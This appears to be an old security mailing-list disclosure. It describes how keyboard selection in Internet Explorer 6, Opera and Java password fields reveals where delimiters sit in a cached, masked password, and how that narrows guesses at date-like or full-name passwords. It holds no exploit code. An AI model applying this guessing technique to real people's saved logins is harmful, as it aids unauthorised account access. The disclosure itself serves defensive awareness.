Hi,
Microsoft's IE has a feature of storing login passwords for future use. With
(at least) IE 6 on Win2k SP3 (as well as others, see below,) if you see the
login screen with <input
type="password"...> tag, and the cached password apears as astrisks, if you
stand at the beginning of the string and Ctrl+Shift+Right Arrow to select
the whole string, if the password contains any delimiters (i.e. spaces
colons, commas,...etc.) the selection will stop before it. That means that
the next char is a delimiter. One might say, "why bother? Snadboy's
Revelation will give me the cleartext password!" Well, this might be true
with IE, but the same thing is with apps built with Java (tested on JDK 1.3)
which Revelations doesn't reveal. By knowing the existence of a delimiter,
and the number of chars, and some social engineering sense, one may guess
the password.
Example 1: Many poeple use dates as their passwords, they usually meet the
regex '^([0-9]{1,2}[\/\-\.]){2}[1-9]{2,4}$', this means that if you can find
that the password pattern meet the previous pattern, easier guessing/brute
forcing can be done.
Example 2: Some people tend to use their full name, so a single seperator
between two parts with the same number of characters of victim's full name
meen even easier gussing.
I haven't tested on *NIX yet.
Tested on:
=======
* Internet Explorer 6 (On Win2k Pro SP3) =====> Vulnerable
* Netscape Navigator (On Win2k Pro SP3) =====> Not Vulnerable
* Mozilla (On Win2k Pro SP3) =====> Not Vulnerable
* Opera 6.02 (On Win2k Pro SP3) =====> Vulnerable
* Java based applications/applets (JDK 1.3) =====> Vulnerable
* Visual C++ 6 (MFC 4.2) appications =====> Not Vulnerable
* Visual Basic 6 applications =====> Not Vulnerable
Peace
NP-completer
XEgypt.org
